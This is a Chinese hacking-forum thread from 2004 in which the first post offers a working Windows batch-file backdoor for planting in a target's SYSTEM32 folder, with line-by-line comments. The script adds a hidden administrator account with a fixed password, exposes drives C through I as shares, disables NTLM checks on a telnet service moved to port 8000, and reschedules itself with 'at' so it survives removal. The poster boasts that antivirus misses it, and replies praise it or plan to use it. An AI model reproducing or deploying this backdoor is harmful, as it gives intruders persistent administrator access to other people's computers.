|
 | 作者: lhh2003 [lhh2003]
 论坛用户 |
登录 |
| 这个后门唯一的好处就是不会被查杀,还有就是小巧,放到对方SYSTEM32目录下就可以了,代码如下:(`后面是我的解释,用的时候可以去掉) @echo off `关闭回显 @net user skyapex hacker /add `加一个用户为skyapex,密码为hacker的用户 @net localgroup administrators skyapex /add `加入管理员组 @net share c$=c: `以下是共享c.d.e.f.g.h.i盘 @net share d$=d: @net share e$=e: @net share f$=f: @net share g$=g: @net share h$=h: @net share i$=i: @echo 3 > c:\WINNT\SYSTEM32\tl.txt `在SYSTEM32目录下生成一个文件,为去掉NTLM验证做准备:) @echo 8 >> c:\WINNT\SYSTEM32\tl.txt @echo y >> c:\WINNT\SYSTEM32\tl.txt @echo 8000 >> c:\WINNT\SYSTEM32\tl.txt @echo y >> c:\WINNT\SYSTEM32\tl.txt @echo 7 >> c:\WINNT\SYSTEM32\tl.txt @echo y >> c:\WINNT\SYSTEM32\tl.txt @echo 0 >> c:\WINNT\SYSTEM32\tl.txt @echo y >> c:\WINNT\SYSTEM32\tl.txt @echo 0 >> c:\WINNT\SYSTEM32\tl.txt @echo 5 >> c:\WINNT\SYSTEM32\tl.txt @echo 4 >> c:\WINNT\SYSTEM32\tl.txt @echo 0 >> c:\WINNT\SYSTEM32\tl.txt @tlntadmn < c:\WINNT\SYSTEM32\tl.txt `重定向改掉NTLM验证 @echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\1.bat `生成一个文件,计划在11:00运行log.bat @echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\1.bat `计划在23:00运行log.bat @at 11:05 c:\WINNT\SYSTEM32\1.bat `计划11:05运行1.bat @at 23:05 c:\WINNT\SYSTEM32\1.bat `计划23:05运行1.bat @net stop telnet `停止telnet服务 @net start telnet `开始telnet服务 @exit `退出 这样就回循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵。 运行后TELNET到目标的8000断口上去,用户名为skyapex,密码为hacker。 |
| 地主 发表时间: 04-02-12 20:01 |
 | 回复: wangsong [wangsong]  论坛用户 |
登录 |
|
不错呀!很好 |
| B1层 发表时间: 04-02-15 09:58 |
 | 回复: k_com [k_com]  论坛用户 |
登录 |
|
看起来很好~~有机会用的了 |
| B2层 发表时间: 04-02-15 10:18 |
 | 回复: hudou [hudou]  论坛用户 |
登录 |
|
不错是不错,但很容易被发现呀他当网管是白痴呀一看AT就知道了 |
| B3层 发表时间: 04-02-15 15:38 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 一个批处理后门推荐大家使用!